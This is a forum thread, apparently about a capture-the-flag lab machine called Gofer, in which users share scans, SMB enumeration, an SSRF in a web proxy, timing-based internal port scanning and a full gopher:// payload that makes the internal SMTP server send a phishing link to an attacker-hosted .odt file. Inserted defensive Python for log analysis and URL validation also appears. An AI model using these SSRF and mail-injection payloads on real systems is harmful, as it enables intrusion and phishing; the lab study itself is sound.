Gofer - Thread
by chickensaladsand - Sunday July 30, 2023 at 07:10 AM
#1
How are y'all doing with this one?

└──╼ [★]$ nmap -T5 10.129.253.60 -sVC -p22,25,80,139,445
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-30 08:06 BST
Nmap scan report for 10.129.253.60
Host is up (0.012s latency).

PORT    STATE    SERVICE    VERSION
22/tcp  open    ssh        OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|  3072 aa25826eb804b6a9a95e1a91f09451dd (RSA)
|  256 1821baa7dce44f60d781039a5dc2e596 (ECDSA)
|_  256 a42d0d45132a9e7f867af6f778bc42d9 (ED25519)
25/tcp  filtered smtp
80/tcp  open    http        Apache httpd 2.4.56
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Did not follow redirect to http://gofer.htb/
139/tcp open    netbios-ssn Samba smbd 4.6.2
445/tcp open    netbios-ssn Samba smbd 4.6.2
Service Info: Host: gofer.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time:
|  date: 2023-07-30T07:06:37
|_  start_date: N/A
|_nbstat: NetBIOS name: GOFER, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode:
|  311:
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.65 seconds


#2
Okay, then try to scan SMB

$ smbmap -H 10.129.251.208 -u " "
[+] Guest session      IP: 10.129.251.208:445  Name: gofer.htb
        Disk            Permissions    Comment
        ----            -----------    -------
        print$          NO ACCESS      Printer Drivers
        shares          READ ONLY
        IPC$            NO ACCESS      IPC Service (Samba 4.13.13-Debian)

There is anonymous access to the `shares` folder; let's see what's in it.

$ smbclient -N //10.129.251.208/shares
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Oct 28 23:32:08 2022
  ..                                  D        0  Fri Apr 28 15:59:34 2023
  .backup                            DH        0  Thu Apr 27 16:49:32 2023

                5061888 blocks of size 1024. 2032316 blocks available

smb: \> cd .backup
smb: \.backup\> ls
  .                                   D        0  Thu Apr 27 16:49:32 2023
  ..                                  D        0  Fri Oct 28 23:32:08 2022
  mail                                N     1101  Thu Apr 27 16:49:32 2023

                5061888 blocks of size 1024. 2032312 blocks available

smb: \.backup\> get mail
getting file \.backup\mail of size 1101 as mail (1.9 KiloBytes/sec) (average 1.9 KiloBytes/sec)

$ cat mail                             
From jdavis@gofer.htb  Fri Oct 28 20:29:30 2022
Return-Path: <jdavis@gofer.htb>
X-Original-To: tbuckley@gofer.htb
Delivered-To: tbuckley@gofer.htb
Received: from gofer.htb (localhost [127.0.0.1])
        by gofer.htb (Postfix) with SMTP id C8F7461827
        for <tbuckley@gofer.htb>; Fri, 28 Oct 2022 20:28:43 +0100 (BST)
Subject:Important to read!
Message-Id: <20221028192857.C8F7461827@gofer.htb>
Date: Fri, 28 Oct 2022 20:28:43 +0100 (BST)
From: jdavis@gofer.htb

Hello guys,

Our dear Jocelyn received another phishing attempt last week and his habit of clicking on links without paying much attention may be problematic one day. That's why from now on, I've decided that important documents will only be sent internally, by mail, which should greatly limit the risks. If possible, use an .odt format, as documents saved in Office Word are not always well interpreted by Libreoffice.

PS: Last thing for Tom; I know you're working on our web proxy but if you could restrict access, it will be more secure until you have finished it. It seems to me that it should be possible to do so via <Limit>

We became aware of a few things
1) there is a proxy
2) you need to use .odt files
3) mail works within the company

Let's find a proxy

$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://gofer.htb" -H "Host: FUZZ.gofer.htb" -fw 20

[Status: 401, Size: 462, Words: 42, Lines: 15, Duration: 138ms]
* FUZZ: proxy

Add it to `/etc/hosts`.

Then scan the directory from http://gofer.htb.

$ dirsearch -u http://gofer.htb/             
                       
[12:55:13] 301 - 307B - /assets -> http://gofer.htb/assets/
[12:55:13] 200 - 2KB - /assets/
[12:55:30] 200 - 29KB - /index.html                                

Open a browser and follow the link. I have not gone further yet; I am analyzing what I found.
#3
(Jul 30, 2023, 01:08 PM)th3unknown Wrote:
(Jul 30, 2023, 09:14 AM)4ip0k Wrote: Okay, then try to scan SMB


I'm stuck at this point... any hints?

First of all, sorry for my English. It seems that in proxy.gofer.htb there is an SSRF.

└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.132.2 - - [30/Jul/2023 14:45:54] "GET /test.txt HTTP/1.1" 200 -

curl -v -XOPTIONS "http://proxy.gofer.htb/index.php?url=10.10.14.112/test.txt"
*  Trying 10.129.132.2:80...
* Connected to proxy.gofer.htb (10.129.132.2) port 80 (#0)
> OPTIONS /index.php?url=10.10.14.112/test.txt HTTP/1.1
> Host: proxy.gofer.htb
> User-Agent: curl/7.88.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 30 Jul 2023 18:45:57 GMT
< Server: Apache/2.4.56 (Debian)
< Content-Length: 39
< Content-Type: text/html; charset=UTF-8
<
<!-- Welcome to Gofer proxy -->
Hello
* Connection #0 to host proxy.gofer.htb left intact
1
#4
(Jul 30, 2023, 07:10 AM)chickensaladsand Wrote: How are y'all doing with this one?

okkkkkkkkkkkkkkkkkkkkk
#5
(Jul 30, 2023, 06:49 PM)betecito Wrote:
(Jul 30, 2023, 01:08 PM)th3unknown Wrote:
(Jul 30, 2023, 09:14 AM)4ip0k Wrote: Okay, then try to scan SMB


It is. So you want to use the gopher protocol to craft an SSRF payload based on the information in the email found on SMB.

#6
(Jul 30, 2023, 06:53 PM)cutty Wrote:
(Jul 30, 2023, 06:49 PM)betecito Wrote:
(Jul 30, 2023, 01:08 PM)th3unknown Wrote:
(Jul 30, 2023, 09:14 AM)4ip0k Wrote: Okay, then try to scan SMB


A detail... to perform a port scan through SSRF, observe the milliseconds it takes to respond.

Closed port:
└─# curl -v -XOPTIONS "http://proxy.gofer.htb/index.php?url=127.0.0.1:1001" -s -w %{time_total}
* Trying 10.129.132.2:80...
* Connected to proxy.gofer.htb (10.129.132.2) port 80 (#0)
> OPTIONS /index.php?url=127.0.0.1:1001 HTTP/1.1
> Host: proxy.gofer.htb
> User-Agent: curl/7.88.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 30 Jul 2023 19:11:15 GMT
< Server: Apache/2.4.56 (Debian)
< Content-Length: 32
< Content-Type: text/html; charset=UTF-8
<
<!-- Welcome to Gofer proxy -->
* Connection #0 to host proxy.gofer.htb left intact
0.067617

Open Port:
└─# curl -v -XOPTIONS "http://proxy.gofer.htb/index.php?url=127.0.0.1:25" -s -w %{time_total}
* Trying 10.129.132.2:80...
* Connected to proxy.gofer.htb (10.129.132.2) port 80 (#0)
> OPTIONS /index.php?url=127.0.0.1:25 HTTP/1.1
> Host: proxy.gofer.htb
> User-Agent: curl/7.88.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 30 Jul 2023 19:12:05 GMT
< Server: Apache/2.4.56 (Debian)
< Content-Length: 32
< Content-Type: text/html; charset=UTF-8
<
<!-- Welcome to Gofer proxy -->
* Connection #0 to host proxy.gofer.htb left intact
0.146736
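
Seen from the server, the probing in the post above shows up in the proxy's access log as one client requesting many ports on the same host, using a method other than GET or POST and still receiving 200. The following is an added example, not part of the original thread: a log check over constructed Apache-style lines, where the log format, the threshold and the second client address are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Apache combined log format: client, method, request URI and status are used.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) ')
EXPECTED_METHODS = {"GET", "POST", "HEAD"}
SWEEP_THRESHOLD = 3  # distinct ports per client and target host (assumed value)


def parse_target(uri):
    """Return (scheme, host, port) named by the url= parameter, or None."""
    try:
        raw = parse_qs(urlsplit(uri).query).get("url", [""])[0]
        if not raw:
            return None
        if "://" not in raw:
            raw = "http://" + raw  # bare host:port form, as in url=127.0.0.1:25
        target = urlsplit(raw)
        return target.scheme.lower(), target.hostname, target.port
    except ValueError:  # malformed URL or port
        return None


def analyse(lines):
    """Return sorted unique findings as (client, kind, detail) tuples."""
    findings = set()
    ports = defaultdict(set)  # (client, target host) -> ports requested
    for line in lines:
        m = LOG_RE.match(line)
        target = parse_target(m["uri"]) if m else None
        if target is None:
            continue
        scheme, host, port = target
        client = m["client"]
        # A 200 for a method the application never uses suggests that access
        # control is bound to specific methods only.
        if m["method"] not in EXPECTED_METHODS and m["status"] == "200":
            findings.add((client, "unexpected-method", m["method"]))
        if scheme not in ("http", "https"):
            findings.add((client, "non-http-scheme", scheme))
        if port is not None:
            ports[(client, host)].add(port)
    for (client, host), seen in ports.items():
        if len(seen) >= SWEEP_THRESHOLD:
            findings.add((client, "port-sweep", "%s %s" % (host, sorted(seen))))
    return sorted(findings)


# Constructed sample lines modelled on the requests shown in the thread.
SAMPLE_LOG = [
    '10.10.14.50 - - [30/Jul/2023:19:10:02 +0000] "GET /index.php?url=http://example.org/ HTTP/1.1" 401 462 "-" "Mozilla/5.0"',
    '10.10.14.112 - - [30/Jul/2023:19:11:15 +0000] "OPTIONS /index.php?url=127.0.0.1:1001 HTTP/1.1" 200 32 "-" "curl/7.88.1"',
    '10.10.14.112 - - [30/Jul/2023:19:12:05 +0000] "OPTIONS /index.php?url=127.0.0.1:25 HTTP/1.1" 200 32 "-" "curl/7.88.1"',
    '10.10.14.112 - - [30/Jul/2023:19:12:09 +0000] "OPTIONS /index.php?url=127.0.0.1:22 HTTP/1.1" 200 32 "-" "curl/7.88.1"',
    '10.10.14.112 - - [30/Jul/2023:19:35:40 +0000] "OPTIONS /index.php?url=gopher://2130706433:25/xHELO HTTP/1.1" 200 32 "-" "curl/7.88.1"',
]

if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(finding)
```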
#7
use gopher
#8
try this one : gopher://2130706433:25/xHELO%20gofer.htb%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cjhudson@gofer.htb%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cjhudson@gofer.htb%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%20<a+href%3d'http%3a//<YOUR_IP>/bad.odt>this</a>%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
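
Added example (not from the thread and not the box's own code): a target check that a fetch-by-URL endpoint such as `index.php?url=` could run before fetching, showing why `gopher://2130706433:25/` has to be rejected on scheme and, independently, on address. The policy (http/https only, ports 80/443, public addresses only), the function names and the stub resolver are assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http": 80, "https": 443}  # scheme -> default port (assumed policy)
ALLOWED_PORTS = {80, 443}


def canonical_ip(host):
    """Return the address a host literal denotes, or None if it is a DNS name."""
    try:
        return ipaddress.ip_address(host)  # 127.0.0.1, ::1
    except ValueError:
        pass
    try:
        # inet_aton also accepts 2130706433, 0x7f000001 and 127.1
        return ipaddress.ip_address(socket.inet_aton(host))
    except (OSError, ValueError):
        return None


def check_proxy_target(url, resolve=socket.getaddrinfo):
    """Return (allowed, reason) for a URL given to a fetch-by-URL endpoint."""
    if "://" not in url:
        url = "http://" + url  # bare host/path form, e.g. url=host/file
    try:
        parts = urlsplit(url)
        scheme = parts.scheme.lower()
        if scheme not in ALLOWED_SCHEMES:
            return False, "scheme '%s' is not allowed" % scheme
        host = parts.hostname
        port = parts.port or ALLOWED_SCHEMES[scheme]
    except ValueError:
        return False, "malformed URL"
    if not host:
        return False, "no host"
    literal = canonical_ip(host)
    if literal is not None:
        addrs = [literal]
    else:
        try:
            addrs = [ipaddress.ip_address(ai[4][0]) for ai in resolve(host, port)]
        except (OSError, ValueError):
            addrs = []
    if not addrs:
        return False, "host does not resolve"
    for addr in addrs:
        if not addr.is_global:  # loopback, private, link-local, reserved
            return False, "%s resolves to non-public address %s" % (host, addr)
    if port not in ALLOWED_PORTS:
        return False, "port %d is not allowed" % port
    # The fetcher must connect to the address checked here, not resolve again.
    return True, "ok"


def fake_resolve(host, port):
    """Constructed stand-in for DNS so the example runs offline."""
    return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", ("93.184.216.34", port))]


if __name__ == "__main__":
    for sample in ("gopher://2130706433:25/xHELO%20gofer.htb",
                   "http://2130706433/", "127.0.0.1:25",
                   "http://example.org:25/", "http://example.org/doc.odt"):
        print(sample, check_proxy_target(sample, fake_resolve))
```

A check like this only helps if the fetch library is also restricted to the same schemes and does not follow redirects to targets that were never checked.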
#9
(Jul 30, 2023, 07:35 PM)frfrfrfrfrfrf Wrote: try this one : gopher://2130706433:25/xHELO%20gofer.htb%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cjhudson@gofer.htb%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cjhudson@gofer.htb%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%20<a+href%3d'http%3a//<YOUR_IP>/bad.odt>this</a>%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a

wow, that's good! thanks a lot
#10
By the way, there is also an LFI in the url parameter, but it is not the way to root the machine.

